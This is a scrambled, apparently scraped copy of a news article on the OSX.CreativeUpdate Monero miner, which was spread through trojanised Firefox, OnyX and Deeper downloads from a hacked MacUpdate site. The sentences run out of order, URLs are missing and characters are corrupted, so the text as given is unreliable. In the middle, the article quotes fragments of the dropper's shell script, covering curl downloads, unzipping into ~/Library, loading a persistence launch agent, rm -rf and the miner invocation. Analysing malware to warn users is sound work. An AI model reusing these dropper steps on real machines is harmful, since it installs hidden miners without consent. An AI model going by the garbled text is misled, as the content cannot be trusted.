![]() These are not guarantees, and can still get you infected with malware, adware, or scam software. Instead, always download software directly from the developer's site or from the Mac App Store. This is no longer happening, but in 2016, MacUpdate was similarly used to distribute the OSX.Eleanor malware. In the case of MacUpdate, back in 2015 they were modifying other people's software, wrapping it in their own adware-laden installer. Such sites have a long history of issues. First and foremost, never download software from any kind of "download aggregation" site (a site that acts like an unofficial Mac App Store to let you browse for software). That sysmdworker process will then do the work of mining the Monero cryptocurrency, using a command-line tool called minergate-cli, and periodically connecting to, passing in the above email address as the login. This loads a malicious sysmdworker process, passing in a couple arguments, one of which is an email address. Sh -c ~/Library/mdworker/sysmdworker -user -xmr Before doing so, it will remove the previous ist file, presumably so it can be updated with new code. The version of this ist file that we obtained did the real work. When this launch agent runs, it downloads a new ist file and installs it. rf ~/Library/LaunchAgents/ist & curl -oĬontent_disposition=attachment & launchctl load -w Launchctl unload -w ~/Library/LaunchAgents/ist & rm It also installs a malicious launch agent file named ist, which recurrently runs another script. If the malware is not installed, it will download the malware and unzip it into the user's Library folder, which is hidden in macOS by default, so most users wouldn't even know anything had been added there. Next, if the malware is already installed, the malicious dropper process is killed, since installation is not necessary. ~/Library/mdworker.zip & killall Deeperd &įor those who can't read shell scripts, this code first attempts to open the decoy Deeper.app, which will fail since the wrong decoy was included by mistake. & launchctl load -w ~/Library/LaunchAgents/ist & rm -rf ~/Library/mdworker/ist ~/Library/LaunchAgents & sleep 300 ~/Library & mkdir -p ~/Library/LaunchAgents & mv If thenĬontent_disposition=attachment & unzip -o ~/Library/mdworker.zip -d The "script" file inside the app takes care of opening the decoy app, and then downloading and installing the malware. In the case of the Deeper app, the hackers got even sloppier, including an OnyX app instead of a Deeper app as the decoy by mistake, making it fail similarly but for a more laughable reason. ![]() This means that on any system between 10.7 and 10.12, the malware will run, but the decoy app won't open to cover up the fact that something malicious is going on. For example, the malicious OnyX app will run on Mac OS X 10.7 and up, but the decoy OnyX app requires macOS 10.13. Then, it attempts to open a copy of the original app (referred to as a decoy app, because it is used to trick the user into thinking nothing's wrong), which is included inside the malicious app. Once the application has been installed, when the user opens it, it will download and install the payload from (a legitimate site owned by Adobe). This means the creation of these applications had a low bar for entry. The applications themselves were, as Abbati indicated in his tweet, created by Platypus, a developer tool that makes full macOS applications from a variety of scripts, such as shell or Python scripts. In each case, the user is asked to drag the app into the Applications folder, as would the original, non-malicious. dmg (disk image) files, and they look pretty convincing. This is a common scammer trick to make you think it's coming from a legitimate site.) (Notice the domain ends in, which is definitely not the same as. The fake Firefox app was distributed from . ![]() According to a statement posted in the comments for each of the affected apps on the MacUpdate website, this happened sometime on February 1.īoth OnyX and Deeper are products made by Titanium Software (), but the site was changed maliciously to point to download URLs at , a domain first registered on January 23, and whose ownership is obscured. The malware was spread via hack of the MacUpdate site, which was distributing maliciously-modified copies of the Firefox, OnyX, and Deeper applications. This malware, which Abbati has named OSX.CreativeUpdate, is a new cryptocurrency miner, designed to sit in the background and use your computer's CPU to mine the Monero currency. Early this morning, security researcher Arnaud Abbati of SentinelOne tweeted about new Mac malware being distributed via MacUpdate.
0 Comments
Leave a Reply. |